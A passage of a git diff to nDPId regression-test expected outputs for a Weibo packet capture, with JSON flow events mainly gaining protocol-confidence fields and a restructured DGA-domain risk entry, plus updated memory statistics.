+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089072333,"flow_last_seen":1463089072444,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":91,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":53543,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089072885,"flow_last_seen":1463089073423,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":41352,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}}
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073424,"flow_last_seen":1463089073424,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":16804,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00604{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089072046,"flow_last_seen":1463089072070,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.212.65","src_port":34699,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
+00638{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089072046,"flow_last_seen":1463089072070,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.212.65","src_port":34699,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089072046,"flow_last_seen":1463089072070,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.212.65","src_port":34699,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00591{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073488,"flow_last_seen":1463089073488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.174.1","src_port":48352,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00627{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073488,"flow_last_seen":1463089073488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.174.1","src_port":48352,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073488,"flow_last_seen":1463089073488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.174.1","src_port":48352,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00591{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073488,"flow_last_seen":1463089073488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.174.1","src_port":48353,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00627{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073488,"flow_last_seen":1463089073488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.174.1","src_port":48353,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073488,"flow_last_seen":1463089073488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.174.1","src_port":48353,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00591{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073537,"flow_last_seen":1463089073537,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.174.1","src_port":48356,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00627{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073537,"flow_last_seen":1463089073537,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.174.1","src_port":48356,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073537,"flow_last_seen":1463089073537,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.174.1","src_port":48356,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089071551,"flow_last_seen":1463089071612,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":131,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":7148,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}}
-00643{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089073289,"flow_last_seen":1463089073763,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":79,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":33822,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00606{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1463089067804,"flow_last_seen":1463089068491,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":618,"flow_tot_l4_payload_len":1566,"flow_avg_l4_payload_len":174,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"216.58.210.14","dst_ip":"192.168.1.105","src_port":443,"dst_port":49361,"l4_proto":"udp","ndpi": {"proto":"Google","breed":"Acceptable","category":"Web"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089071551,"flow_last_seen":1463089071612,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":131,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":7148,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}}
+00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089073289,"flow_last_seen":1463089073763,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":79,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":33822,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1463089067804,"flow_last_seen":1463089068491,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":618,"flow_tot_l4_payload_len":1566,"flow_avg_l4_payload_len":174,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"216.58.210.14","dst_ip":"192.168.1.105","src_port":443,"dst_port":49361,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Google","breed":"Acceptable","category":"Web"}}
 00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1463089067804,"flow_last_seen":1463089068491,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":618,"flow_tot_l4_payload_len":1566,"flow_avg_l4_payload_len":174,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"216.58.210.14","dst_ip":"192.168.1.105","src_port":443,"dst_port":49361,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00643{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1463089070841,"flow_last_seen":1463089071891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":1081,"flow_avg_l4_payload_len":120,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59119,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"}}
-00608{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463089070841,"flow_last_seen":1463089071198,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59120,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00669{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1463089070841,"flow_last_seen":1463089071891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":1081,"flow_avg_l4_payload_len":120,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59119,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463089070841,"flow_last_seen":1463089071198,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59120,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00570{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463089070841,"flow_last_seen":1463089071198,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59120,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00608{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463089071008,"flow_last_seen":1463089071348,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59121,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463089071008,"flow_last_seen":1463089071348,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59121,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00570{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463089071008,"flow_last_seen":1463089071348,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59121,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00604{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089071046,"flow_last_seen":1463089071094,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.210.206","src_port":35154,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
+00638{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089071046,"flow_last_seen":1463089071094,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.210.206","src_port":35154,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089071046,"flow_last_seen":1463089071094,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.210.206","src_port":35154,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00608{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1463089070755,"flow_last_seen":1463089072356,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":391,"flow_tot_l4_payload_len":1586,"flow_avg_l4_payload_len":113,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.210.227","src_port":53656,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"Google","breed":"Acceptable","category":"Web"}}
+00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1463089070755,"flow_last_seen":1463089072356,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":391,"flow_tot_l4_payload_len":1586,"flow_avg_l4_payload_len":113,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.210.227","src_port":53656,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Google","breed":"Acceptable","category":"Web"}}
 00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1463089070755,"flow_last_seen":1463089072356,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":391,"flow_tot_l4_payload_len":1586,"flow_avg_l4_payload_len":113,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.210.227","src_port":53656,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073479,"flow_last_seen":1463089073479,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":50533,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":79,"flow_first_seen":1463089071613,"flow_last_seen":1463089072438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2872,"flow_tot_l4_payload_len":31898,"flow_avg_l4_payload_len":403,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.137","src_port":51698,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}}
-00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089073287,"flow_last_seen":1463089073760,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":75,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":50640,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"16":"Suspicious DGA domain name"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":79,"flow_first_seen":1463089071613,"flow_last_seen":1463089072438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2872,"flow_tot_l4_payload_len":31898,"flow_avg_l4_payload_len":403,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.137","src_port":51698,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}}
+00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089073287,"flow_last_seen":1463089073760,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":75,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":50640,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073394,"flow_last_seen":1463089073394,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":11798,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00156{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","total-events-serialized":237}
+00156{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","total-events-serialized":238}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 498/498
 ~~ skipped flows.............: 0
@@ -243,10 +244,10 @@
 ~~ total active/idle flows...: 44/44
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4664837 bytes
-~~ total memory freed........: 4664837 bytes
-~~ total allocations/frees...: 100219/100219
+~~ total memory allocated....: 4735686 bytes
+~~ total memory freed........: 4735686 bytes
+~~ total allocations/frees...: 101809/101809
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 161 chars
-~~ json string max len.......: 925 chars
-~~ json string avg len.......: 613 chars
+~~ json string max len.......: 940 chars
+~~ json string avg len.......: 620 chars
diff --git a/test/results/whatsapp_login_call.pcap.out b/test/results/whatsapp_login_call.pcap.out
index 5cf856640..f50dfb340 100644
--- a/test/results/whatsapp_login_call.pcap.out
+++ b/test/results/whatsapp_login_call.pcap.out
@@ -41,16 +41,16 @@
